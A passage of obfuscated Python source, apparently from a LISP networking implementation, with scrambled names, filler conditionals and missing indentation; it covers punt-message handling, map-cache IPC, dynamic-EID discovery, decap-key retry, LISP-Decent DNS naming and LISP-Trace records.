lisp_decap_stats [ O0OOooo0 ] . last_increment = lisp_get_timestamp ( ) - i1
if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
return
if 37 - 37: O0 + IiII + I1IiiI
if 50 - 50: OoooooooOO . I1Ii111
if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
if 13 - 13: iII111i . I11i * OoO0O00 . i1IIi . iIii1I11I1II1 - o0oOOo0O0Ooo
if 68 - 68: Ii1I % o0oOOo0O0Ooo / OoooooooOO + Ii1I - Ii1I
if 79 - 79: II111iiii / IiII
if 4 - 4: O0 - i11iIiiIii % ooOoO0o * O0 - ooOoO0o
if 96 - 96: oO0o % II111iiii . Ii1I % OoO0O00 . iIii1I11I1II1 / IiII
if 96 - 96: o0oOOo0O0Ooo / O0 . iIii1I11I1II1 . Ii1I % OOooOOo % II111iiii
if 5 - 5: OoooooooOO / I1Ii111 % I1Ii111 / I1IiiI
if 19 - 19: I1IiiI - ooOoO0o % IiII - o0oOOo0O0Ooo * OOooOOo + I1ii11iIi11i
if 44 - 44: i1IIi
if 85 - 85: I1ii11iIi11i / IiII + oO0o
if 95 - 95: IiII . OoO0O00
if 36 - 36: IiII % Ii1I - OoOoOO00 + OoO0O00 + IiII * Ii1I
if 15 - 15: I1IiiI / O0 % I1ii11iIi11i % OoOoOO00 . OoOoOO00 + iII111i
if 79 - 79: OOooOOo + Ii1I . I1Ii111 / Oo0Ooo / i11iIiiIii / O0
def lisp_process_punt ( punt_socket , lisp_send_sockets , lisp_ephem_port ) :
IiiIIiI1IIi , i1IIi1ii1i1ii = punt_socket . recvfrom ( 4000 )
if 9 - 9: OoO0O00
ii1Ii1i1ii = json . loads ( IiiIIiI1IIi )
if ( type ( ii1Ii1i1ii ) != dict ) :
lprint ( "Invalid punt message from {}, not in JSON format" . format ( i1IIi1ii1i1ii ) )
if 80 - 80: IiII + OoO0O00
return
if 2 - 2: IiII + OoOoOO00 % oO0o
oooo00oO = bold ( "Punt" , False )
lprint ( "{} message from '{}': '{}'" . format ( oooo00oO , i1IIi1ii1i1ii , ii1Ii1i1ii ) )
if 85 - 85: II111iiii
if ( ii1Ii1i1ii . has_key ( "type" ) == False ) :
lprint ( "Punt IPC message has no 'type' key" )
return
if 7 - 7: OOooOOo - O0 . iIii1I11I1II1 * II111iiii * IiII
if 66 - 66: I1Ii111 + i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo + OoOoOO00
if 56 - 56: i1IIi + i1IIi . IiII . Oo0Ooo % OOooOOo
if 51 - 51: OoO0O00 + i1IIi + iIii1I11I1II1
if 68 - 68: OoOoOO00 . I1IiiI + ooOoO0o - o0oOOo0O0Ooo
if ( ii1Ii1i1ii [ "type" ] == "statistics" ) :
lisp_process_data_plane_stats ( ii1Ii1i1ii , lisp_send_sockets , lisp_ephem_port )
return
if 62 - 62: Ii1I - OOooOOo
if ( ii1Ii1i1ii [ "type" ] == "decap-statistics" ) :
lisp_process_data_plane_decap_stats ( ii1Ii1i1ii , punt_socket )
return
if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
if 68 - 68: I1Ii111 - OoO0O00 % Ii1I + i1IIi . ooOoO0o
if 36 - 36: oO0o * iIii1I11I1II1 - O0 - IiII * O0 + i11iIiiIii
if 76 - 76: OoO0O00 % O0 / Ii1I + I1IiiI
if ( ii1Ii1i1ii [ "type" ] == "restart" ) :
lisp_process_data_plane_restart ( )
return
if 23 - 23: I1IiiI % IiII . o0oOOo0O0Ooo
if 2 - 2: I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 / II111iiii / iIii1I11I1II1 / oO0o % i1IIi
if 54 - 54: ooOoO0o
if 47 - 47: I11i * I1IiiI / oO0o
if ( ii1Ii1i1ii [ "type" ] != "discovery" ) :
lprint ( "Punt IPC message has wrong format" )
return
if 98 - 98: Ii1I / oO0o * O0 + I1Ii111 - I1Ii111 + iII111i
if ( ii1Ii1i1ii . has_key ( "interface" ) == False ) :
lprint ( "Invalid punt message from {}, required keys missing" . format ( i1IIi1ii1i1ii ) )
if 4 - 4: i1IIi
return
if 43 - 43: oO0o * ooOoO0o - I11i
if 70 - 70: oO0o / Ii1I
if 15 - 15: iIii1I11I1II1 % ooOoO0o % i11iIiiIii
if 16 - 16: iII111i
if 50 - 50: iIii1I11I1II1 - II111iiii % i1IIi
OoO0o0OOOO = ii1Ii1i1ii [ "interface" ]
if ( OoO0o0OOOO == "" ) :
o0OoO0000o = int ( ii1Ii1i1ii [ "instance-id" ] )
if ( o0OoO0000o == - 1 ) : return
else :
o0OoO0000o = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 48 - 48: O0
if 60 - 60: ooOoO0o - IiII % i1IIi
if 5 - 5: oO0o
if 29 - 29: i1IIi . OoOoOO00 . i1IIi + oO0o . I1Ii111 + O0
if 62 - 62: I1ii11iIi11i . IiII + OoO0O00 - OoOoOO00 * O0 + I1Ii111
i1I1I = None
if ( ii1Ii1i1ii . has_key ( "source-eid" ) ) :
OoOoo0ooO0000 = ii1Ii1i1ii [ "source-eid" ]
i1I1I = lisp_address ( LISP_AFI_NONE , OoOoo0ooO0000 , 0 , o0OoO0000o )
if ( i1I1I . is_null ( ) ) :
lprint ( "Invalid source-EID format '{}'" . format ( OoOoo0ooO0000 ) )
return
if 58 - 58: oO0o . OoO0O00 / ooOoO0o
if 61 - 61: I11i + I1Ii111
Ooii1 = None
if ( ii1Ii1i1ii . has_key ( "dest-eid" ) ) :
I1iiIo000o0O = ii1Ii1i1ii [ "dest-eid" ]
Ooii1 = lisp_address ( LISP_AFI_NONE , I1iiIo000o0O , 0 , o0OoO0000o )
if ( Ooii1 . is_null ( ) ) :
lprint ( "Invalid dest-EID format '{}'" . format ( I1iiIo000o0O ) )
return
if 17 - 17: Oo0Ooo / ooOoO0o - I1IiiI % iII111i . OoOoOO00 % OoOoOO00
if 88 - 88: Oo0Ooo + Ii1I * IiII . Ii1I * IiII * Oo0Ooo
if 74 - 74: oO0o - II111iiii - I11i - ooOoO0o . I1Ii111 / Ii1I
if 25 - 25: o0oOOo0O0Ooo - iII111i * OoO0O00
if 1 - 1: I1Ii111
if 63 - 63: ooOoO0o % I1Ii111 * I1ii11iIi11i % I1ii11iIi11i . ooOoO0o - O0
if 62 - 62: ooOoO0o
if 35 - 35: iII111i . i11iIiiIii - OOooOOo % Oo0Ooo + Ii1I . iIii1I11I1II1
if ( i1I1I ) :
oOo = green ( i1I1I . print_address ( ) , False )
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( i1I1I , False )
if ( ooOOo0ooo != None ) :
if 91 - 91: o0oOOo0O0Ooo / OoO0O00 + I1IiiI % i11iIiiIii % i1IIi
if 22 - 22: I1Ii111 * O0 % OoO0O00 * I1ii11iIi11i
if 47 - 47: OoO0O00 / OOooOOo / OoOoOO00 % i11iIiiIii / OoOoOO00
if 52 - 52: ooOoO0o / I11i % i11iIiiIii - I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
if 67 - 67: OoOoOO00 / I1Ii111 + i11iIiiIii - IiII
if ( ooOOo0ooo . dynamic_eid_configured ( ) ) :
II1i = lisp_allow_dynamic_eid ( OoO0o0OOOO , i1I1I )
if ( II1i != None and lisp_i_am_itr ) :
lisp_itr_discover_eid ( ooOOo0ooo , i1I1I , OoO0o0OOOO , II1i )
else :
lprint ( ( "Disallow dynamic source-EID {} " + "on interface {}" ) . format ( oOo , OoO0o0OOOO ) )
if 79 - 79: I11i . I11i - OoOoOO00
if 86 - 86: OoO0O00 * Oo0Ooo . iIii1I11I1II1 * O0
if 52 - 52: iII111i - i11iIiiIii + o0oOOo0O0Ooo + i1IIi
else :
lprint ( "Punt from non-EID source {}" . format ( oOo ) )
if 58 - 58: OOooOOo - Ii1I * I1Ii111 - O0 . oO0o
if 72 - 72: i1IIi * iII111i * Ii1I / o0oOOo0O0Ooo . I1Ii111 + i11iIiiIii
if 33 - 33: I11i / OoO0O00 * ooOoO0o + iIii1I11I1II1
if 54 - 54: Oo0Ooo / IiII + i11iIiiIii . O0
if 94 - 94: OoooooooOO + iII111i * OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: iIii1I11I1II1 / iIii1I11I1II1 / II111iiii
if ( Ooii1 ) :
o0o000Oo = lisp_map_cache_lookup ( i1I1I , Ooii1 )
if ( o0o000Oo == None or o0o000Oo . action == LISP_SEND_MAP_REQUEST_ACTION ) :
if 93 - 93: oO0o
if 53 - 53: OoO0O00 * i1IIi / Oo0Ooo / OoO0O00 * ooOoO0o
if 77 - 77: iIii1I11I1II1 % I1IiiI + o0oOOo0O0Ooo + I1Ii111 * Oo0Ooo * i1IIi
if 14 - 14: iIii1I11I1II1 * iIii1I11I1II1 - OOooOOo . iII111i / ooOoO0o
if 54 - 54: OoOoOO00 - I1IiiI - iII111i
if ( lisp_rate_limit_map_request ( Ooii1 ) ) : return
lisp_send_map_request ( lisp_send_sockets , lisp_ephem_port ,
i1I1I , Ooii1 , None )
else :
oOo = green ( Ooii1 . print_address ( ) , False )
lprint ( "Map-cache entry for {} already exists" . format ( oOo ) )
if 49 - 49: i11iIiiIii * Oo0Ooo
if 100 - 100: Oo0Ooo * oO0o
return
if 85 - 85: OoooooooOO . IiII / IiII . ooOoO0o . IiII % II111iiii
if 65 - 65: oO0o - OoO0O00 / iII111i + ooOoO0o
if 80 - 80: o0oOOo0O0Ooo + II111iiii * Ii1I % OoOoOO00 % I1IiiI + I1ii11iIi11i
if 46 - 46: Oo0Ooo / Oo0Ooo % iII111i % I1IiiI
if 85 - 85: OoO0O00 - Ii1I / O0
if 45 - 45: IiII + I1Ii111 / I11i
if 84 - 84: iII111i % II111iiii
def lisp_ipc_map_cache_entry ( mc , jdata ) :
i1ii1i1Ii11 = lisp_write_ipc_map_cache ( True , mc , dont_send = True )
jdata . append ( i1ii1i1Ii11 )
return ( [ True , jdata ] )
if 86 - 86: IiII % II111iiii / i1IIi * I1ii11iIi11i - O0 * OOooOOo
if 53 - 53: OOooOOo * oO0o + i1IIi % Oo0Ooo + II111iiii
if 34 - 34: oO0o % iII111i / IiII . IiII + i11iIiiIii
if 68 - 68: O0 % oO0o * IiII % O0
if 55 - 55: O0 % I1IiiI % O0
if 27 - 27: I1IiiI + I1ii11iIi11i * I1Ii111 % Ii1I - Oo0Ooo
if 87 - 87: i11iIiiIii % OOooOOo - OoOoOO00 * ooOoO0o / Oo0Ooo
if 74 - 74: OoooooooOO * ooOoO0o - I11i / I1ii11iIi11i % iIii1I11I1II1
def lisp_ipc_walk_map_cache ( mc , jdata ) :
if 94 - 94: Ii1I * I1Ii111 + OoOoOO00 . iIii1I11I1II1
if 44 - 44: Oo0Ooo . Oo0Ooo * Oo0Ooo
if 23 - 23: I1Ii111 / iII111i . O0 % II111iiii
if 67 - 67: I11i / iIii1I11I1II1 / ooOoO0o
if ( mc . group . is_null ( ) ) : return ( lisp_ipc_map_cache_entry ( mc , jdata ) )
if 90 - 90: II111iiii % I1Ii111 - IiII . Oo0Ooo % OOooOOo - OoOoOO00
if ( mc . source_cache == None ) : return ( [ True , jdata ] )
if 89 - 89: Oo0Ooo - I1ii11iIi11i . I1Ii111
if 65 - 65: ooOoO0o % OOooOOo + OOooOOo % I1Ii111 . I1IiiI % O0
if 46 - 46: OoO0O00 * I1Ii111 + iII111i . oO0o % OOooOOo / i11iIiiIii
if 1 - 1: I1ii11iIi11i % O0 - I1ii11iIi11i / OoooooooOO / OoO0O00
if 82 - 82: i1IIi % Ii1I
jdata = mc . source_cache . walk_cache ( lisp_ipc_map_cache_entry , jdata )
return ( [ True , jdata ] )
if 85 - 85: I1Ii111 * i11iIiiIii * iIii1I11I1II1 % iIii1I11I1II1
if 64 - 64: OoO0O00 / Ii1I
if 79 - 79: Ii1I % OOooOOo
if 39 - 39: I1ii11iIi11i / Ii1I - II111iiii . i1IIi
if 59 - 59: II111iiii
if 36 - 36: ooOoO0o . II111iiii - OoOoOO00 % I1ii11iIi11i * O0
if 91 - 91: iII111i + Oo0Ooo / OoooooooOO * iIii1I11I1II1 - OoO0O00
def lisp_itr_discover_eid ( db , eid , input_interface , routed_interface ,
lisp_ipc_listen_socket ) :
I11i11i1 = eid . print_address ( )
if ( db . dynamic_eids . has_key ( I11i11i1 ) ) :
db . dynamic_eids [ I11i11i1 ] . last_packet = lisp_get_timestamp ( )
return
if 73 - 73: iIii1I11I1II1 % I1Ii111 % II111iiii * Oo0Ooo * OoO0O00
if 48 - 48: OOooOOo * i11iIiiIii - i11iIiiIii + iIii1I11I1II1 + I1IiiI % OoooooooOO
if 61 - 61: i1IIi
if 56 - 56: iIii1I11I1II1 / I11i * iII111i * I11i * OoooooooOO
if 44 - 44: I1ii11iIi11i - OOooOOo % I11i - I1Ii111 / iIii1I11I1II1 - OOooOOo
I1iIi1IiI1i = lisp_dynamic_eid ( )
I1iIi1IiI1i . dynamic_eid . copy_address ( eid )
I1iIi1IiI1i . interface = routed_interface
I1iIi1IiI1i . last_packet = lisp_get_timestamp ( )
I1iIi1IiI1i . get_timeout ( routed_interface )
db . dynamic_eids [ I11i11i1 ] = I1iIi1IiI1i
if 38 - 38: iIii1I11I1II1 - OoooooooOO * II111iiii . OoooooooOO + OOooOOo
oooII11I11II1 = ""
if ( input_interface != routed_interface ) :
oooII11I11II1 = ", routed-interface " + routed_interface
if 23 - 23: IiII * OoO0O00
if 42 - 42: IiII
OooOoOOOO0OOo = green ( I11i11i1 , False ) + bold ( " discovered" , False )
lprint ( "Dynamic-EID {} on interface {}{}, timeout {}" . format ( OooOoOOOO0OOo , input_interface , oooII11I11II1 , I1iIi1IiI1i . timeout ) )
if 45 - 45: ooOoO0o / OOooOOo / I1Ii111
if 88 - 88: O0 % IiII / oO0o
if 55 - 55: O0 + ooOoO0o * oO0o
if 87 - 87: o0oOOo0O0Ooo + OoOoOO00 * iIii1I11I1II1
if 38 - 38: I1ii11iIi11i - OOooOOo * O0 - I1ii11iIi11i
iiiii1i1 = "learn%{}%{}" . format ( I11i11i1 , routed_interface )
iiiii1i1 = lisp_command_ipc ( iiiii1i1 , "lisp-itr" )
lisp_ipc ( iiiii1i1 , lisp_ipc_listen_socket , "lisp-etr" )
return
if 95 - 95: OoO0O00 . oO0o . OoooooooOO - iIii1I11I1II1
if 35 - 35: o0oOOo0O0Ooo / OoooooooOO - i1IIi * iIii1I11I1II1 + ooOoO0o
if 66 - 66: Oo0Ooo - OoOoOO00 . I1Ii111 + O0 + o0oOOo0O0Ooo
if 36 - 36: II111iiii % IiII . i11iIiiIii
if 88 - 88: Oo0Ooo . IiII * Oo0Ooo
if 92 - 92: I1IiiI % IiII
if 95 - 95: OoooooooOO / OoO0O00 % O0 / I1Ii111 * Ii1I + I1ii11iIi11i
if 7 - 7: ooOoO0o
if 83 - 83: oO0o / I1Ii111 + I1Ii111 * I1ii11iIi11i
if 8 - 8: I11i . I1ii11iIi11i % i1IIi + Ii1I
if 63 - 63: I1IiiI / OoooooooOO
if 16 - 16: OoOoOO00
if 67 - 67: O0 . I1Ii111
def lisp_retry_decap_keys ( addr_str , packet , iv , packet_icv ) :
if ( lisp_search_decap_keys == False ) : return
if 42 - 42: OoOoOO00 % I1ii11iIi11i * I1Ii111 * i1IIi . i1IIi % OOooOOo
if 90 - 90: oO0o * Oo0Ooo * oO0o . Ii1I * i1IIi
if 47 - 47: OOooOOo
if 38 - 38: I11i
if ( addr_str . find ( ":" ) != - 1 ) : return
if 15 - 15: OoO0O00 / ooOoO0o . OoO0O00 - iIii1I11I1II1 + OoooooooOO - OoO0O00
O0Ii1IiiiI = lisp_crypto_keys_by_rloc_decap [ addr_str ]
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
for Oo000O000 in lisp_crypto_keys_by_rloc_decap :
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
if 40 - 40: OoO0O00 - IiII
if 43 - 43: I1Ii111 + i11iIiiIii % iII111i % I1Ii111 - ooOoO0o
if 85 - 85: IiII % iIii1I11I1II1 . I1Ii111
if ( Oo000O000 . find ( addr_str ) == - 1 ) : continue
if 38 - 38: iII111i - I1IiiI / ooOoO0o
if 46 - 46: OOooOOo . O0 / i11iIiiIii . OOooOOo
if 19 - 19: I11i / Oo0Ooo + I1Ii111
if 43 - 43: I1ii11iIi11i
if ( Oo000O000 == addr_str ) : continue
if 18 - 18: I11i / OOooOOo % I11i - o0oOOo0O0Ooo
if 22 - 22: iII111i
if 88 - 88: I11i + OoOoOO00 % IiII % OoO0O00 * O0 / OoooooooOO
if 83 - 83: IiII + I1Ii111 . I1ii11iIi11i * iIii1I11I1II1
i1ii1i1Ii11 = lisp_crypto_keys_by_rloc_decap [ Oo000O000 ]
if ( i1ii1i1Ii11 == O0Ii1IiiiI ) : continue
if 9 - 9: ooOoO0o % IiII - OoOoOO00
if 66 - 66: oO0o % Oo0Ooo
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
i1iii1I11III = i1ii1i1Ii11 [ 1 ]
if ( packet_icv != i1iii1I11III . do_icv ( packet , iv ) ) :
lprint ( "Test ICV with key {} failed" . format ( red ( Oo000O000 , False ) ) )
continue
if 47 - 47: IiII * I11i / o0oOOo0O0Ooo * I1ii11iIi11i
if 58 - 58: O0 . oO0o + Oo0Ooo % OOooOOo % I1ii11iIi11i / I1ii11iIi11i
lprint ( "Changing decap crypto key to {}" . format ( red ( Oo000O000 , False ) ) )
lisp_crypto_keys_by_rloc_decap [ addr_str ] = i1ii1i1Ii11
if 18 - 18: I1ii11iIi11i
return
if 91 - 91: I1IiiI + OoooooooOO / OoooooooOO + I11i
if 95 - 95: iII111i % I1IiiI . ooOoO0o
if 70 - 70: OoOoOO00 - iII111i . IiII + iIii1I11I1II1
if 13 - 13: oO0o * I1Ii111 / I1Ii111 . I1IiiI
if 93 - 93: I11i % OoOoOO00 - OOooOOo + iIii1I11I1II1 / OoooooooOO % i11iIiiIii
if 90 - 90: oO0o % iIii1I11I1II1 + o0oOOo0O0Ooo - I11i / i11iIiiIii
if 57 - 57: I1IiiI . Oo0Ooo / I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
def lisp_decent_pull_xtr_configured ( ) :
return ( lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None )
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
if 90 - 90: OOooOOo / I1IiiI
if 28 - 28: OoooooooOO + i1IIi
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
if 64 - 64: I1IiiI - I1IiiI
if 90 - 90: iII111i - I1IiiI - II111iiii / OOooOOo + Ii1I
def lisp_is_decent_dns_suffix ( dns_name ) :
if ( lisp_decent_dns_suffix == None ) : return ( False )
IiIIO0 = dns_name . split ( "." )
IiIIO0 = "." . join ( IiIIO0 [ 1 : : ] )
return ( IiIIO0 == lisp_decent_dns_suffix )
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
def lisp_get_decent_index ( eid ) :
I11i11i1 = eid . print_prefix ( )
o0oOO = hashlib . sha256 ( I11i11i1 ) . hexdigest ( )
ooo = int ( o0oOO , 16 ) % lisp_decent_modulus
return ( ooo )
if 92 - 92: IiII + oO0o / OoooooooOO / Ii1I / I1IiiI
if 25 - 25: oO0o / OoO0O00 * iII111i - OoOoOO00
if 1 - 1: o0oOOo0O0Ooo - Oo0Ooo * I11i . oO0o
if 15 - 15: I1ii11iIi11i . I1Ii111 + IiII
if 15 - 15: Oo0Ooo . Ii1I - OoooooooOO % OoO0O00 + i11iIiiIii + iII111i
if 91 - 91: OoooooooOO % Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
def lisp_get_decent_dns_name ( eid ) :
ooo = lisp_get_decent_index ( eid )
return ( str ( ooo ) + "." + lisp_decent_dns_suffix )
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if 61 - 61: IiII
if 5 - 5: OOooOOo % iIii1I11I1II1 % O0 * i11iIiiIii / I1Ii111
if 48 - 48: IiII * oO0o
if 53 - 53: i1IIi * iIii1I11I1II1 . OOooOOo
if 68 - 68: IiII % IiII - iII111i . IiII + OoooooooOO
if 82 - 82: Ii1I . II111iiii / i1IIi * OoO0O00
def lisp_get_decent_dns_name_from_str ( iid , eid_str ) :
ooOOoo0 = lisp_address ( LISP_AFI_NONE , eid_str , 0 , iid )
ooo = lisp_get_decent_index ( ooOOoo0 )
return ( str ( ooo ) + "." + lisp_decent_dns_suffix )
if 80 - 80: I11i
if 96 - 96: i1IIi - I1ii11iIi11i * iII111i . OOooOOo . OoO0O00
if 93 - 93: oO0o * Oo0Ooo * IiII
if 26 - 26: o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . I1IiiI + Oo0Ooo
if 90 - 90: IiII * OoooooooOO + II111iiii / iII111i + i11iIiiIii / ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
def lisp_trace_append ( packet , reason = None , ed = "encap" , lisp_socket = None ,
rloc_entry = None ) :
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
OoO00oo00 = 28 if packet . inner_version == 4 else 48
OOO0OOo = packet . packet [ OoO00oo00 : : ]
O0oOo0O0O = lisp_trace ( )
if ( O0oOo0O0O . decode ( OOO0OOo ) == False ) :
lprint ( "Could not decode JSON portion of a LISP-Trace packet" )
return ( False )
if 67 - 67: OoooooooOO % I1IiiI + o0oOOo0O0Ooo + I1Ii111
if 12 - 12: o0oOOo0O0Ooo - Ii1I - I1Ii111 - II111iiii % iIii1I11I1II1 % Ii1I
iIiiIiI111 = "?" if packet . outer_dest . is_null ( ) else packet . outer_dest . print_address_no_iid ( )
if 2 - 2: i1IIi / ooOoO0o + Oo0Ooo % I11i - o0oOOo0O0Ooo
if 54 - 54: o0oOOo0O0Ooo % Ii1I + I1IiiI % II111iiii + I11i - O0
if 70 - 70: Ii1I / oO0o + i11iIiiIii - oO0o
if 26 - 26: OoO0O00 % I1ii11iIi11i * O0 % OoO0O00
if 98 - 98: OoO0O00 . ooOoO0o * I11i / i1IIi
if 57 - 57: i11iIiiIii % OOooOOo
if ( iIiiIiI111 != "?" and packet . encap_port != LISP_DATA_PORT ) :
if ( ed == "encap" ) : iIiiIiI111 += ":{}" . format ( packet . encap_port )
if 67 - 67: oO0o - OOooOOo + II111iiii
if 19 - 19: iIii1I11I1II1 * OoooooooOO - i11iIiiIii . I1Ii111 * OoO0O00
if 30 - 30: iII111i + I1IiiI * ooOoO0o
if 53 - 53: iII111i + IiII
if 52 - 52: II111iiii * i11iIiiIii - IiII * IiII / OoooooooOO
i1ii1i1Ii11 = { }
i1ii1i1Ii11 [ "node" ] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"
if 18 - 18: IiII / O0 / I1ii11iIi11i
iIiI = packet . outer_source
if ( iIiI . is_null ( ) ) : iIiI = lisp_myrlocs [ 0 ]
i1ii1i1Ii11 [ "srloc" ] = iIiI . print_address_no_iid ( )
if 77 - 77: I1IiiI + IiII - oO0o - I1ii11iIi11i * II111iiii + i1IIi
if 79 - 79: I1ii11iIi11i + O0 * OoooooooOO
if 43 - 43: I11i
if 29 - 29: o0oOOo0O0Ooo / I11i
if 88 - 88: OoOoOO00 - Ii1I . O0 % I1Ii111 % I1ii11iIi11i
if ( i1ii1i1Ii11 [ "node" ] == "ITR" and packet . inner_sport != LISP_TRACE_PORT ) :
i1ii1i1Ii11 [ "srloc" ] += ":{}" . format ( packet . inner_sport )
if 56 - 56: OoOoOO00 - iIii1I11I1II1 / I1IiiI - i1IIi / o0oOOo0O0Ooo * I11i
if 70 - 70: OOooOOo
i1ii1i1Ii11 [ "hn" ] = lisp_hostname
Oo000O000 = ed + "-ts"
i1ii1i1Ii11 [ Oo000O000 ] = lisp_get_timestamp ( )
if 11 - 11: I11i * II111iiii * Oo0Ooo + OOooOOo % i1IIi
if 73 - 73: OoO0O00 + O0 / Ii1I . OoooooooOO % iIii1I11I1II1 * i1IIi
if 84 - 84: o0oOOo0O0Ooo . iII111i / o0oOOo0O0Ooo + I1ii11iIi11i % OoO0O00
if 52 - 52: OoOoOO00 / Ii1I % OoOoOO00 % i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
if 63 - 63: I1IiiI
if 20 - 20: oO0o + OoOoOO00
if ( iIiiIiI111 == "?" and i1ii1i1Ii11 [ "node" ] == "ETR" ) :
ooOOo0ooo = lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( ooOOo0ooo != None and len ( ooOOo0ooo . rloc_set ) >= 1 ) :
iIiiIiI111 = ooOOo0ooo . rloc_set [ 0 ] . rloc . print_address_no_iid ( )
if 32 - 32: o0oOOo0O0Ooo % oO0o % I1IiiI * OoooooooOO
if 4 - 4: OOooOOo % oO0o
i1ii1i1Ii11 [ "drloc" ] = iIiiIiI111
if 18 - 18: Ii1I * I11i
if 14 - 14: ooOoO0o . ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - I1Ii111
if 53 - 53: Oo0Ooo * OoOoOO00 * II111iiii % IiII - I1ii11iIi11i
if 56 - 56: Oo0Ooo . I1ii11iIi11i - i11iIiiIii / iIii1I11I1II1 . ooOoO0o
if ( iIiiIiI111 == "?" and reason != None ) :
i1ii1i1Ii11 [ "drloc" ] += " ({})" . format ( reason )
if 28 - 28: OoooooooOO + I1IiiI / oO0o . iIii1I11I1II1 - oO0o
if 64 - 64: I1Ii111 + Oo0Ooo / iII111i
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if ( rloc_entry != None ) :
i1ii1i1Ii11 [ "rtts" ] = rloc_entry . recent_rloc_probe_rtts
i1ii1i1Ii11 [ "hops" ] = rloc_entry . recent_rloc_probe_hops
i1ii1i1Ii11 [ "latencies" ] = rloc_entry . recent_rloc_probe_latencies
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
i1I1I = packet . inner_source . print_address ( )
Ooii1 = packet . inner_dest . print_address ( )
if ( O0oOo0O0O . packet_json == [ ] ) :
II1i1I1IIiII1 = { }
II1i1I1IIiII1 [ "seid" ] = i1I1I
II1i1I1IIiII1 [ "deid" ] = Ooii1
II1i1I1IIiII1 [ "paths" ] = [ ]
O0oOo0O0O . packet_json . append ( II1i1I1IIiII1 )
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
if 98 - 98: iII111i / I1ii11iIi11i
for II1i1I1IIiII1 in O0oOo0O0O . packet_json :
if ( II1i1I1IIiII1 [ "deid" ] != Ooii1 ) : continue
II1i1I1IIiII1 [ "paths" ] . append ( i1ii1i1Ii11 )
break
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
if 3 - 3: II111iiii % iII111i / IiII * ooOoO0o . OoooooooOO
if 56 - 56: IiII * II111iiii + Oo0Ooo - O0 - OoO0O00 . I1Ii111
if 53 - 53: i1IIi + IiII
if 90 - 90: II111iiii / oO0o / oO0o . OoOoOO00 / OoO0O00 / iIii1I11I1II1
if 96 - 96: iIii1I11I1II1 % I1ii11iIi11i
if 35 - 35: i1IIi - OoooooooOO * Ii1I / OOooOOo % I11i
o0OOo = False
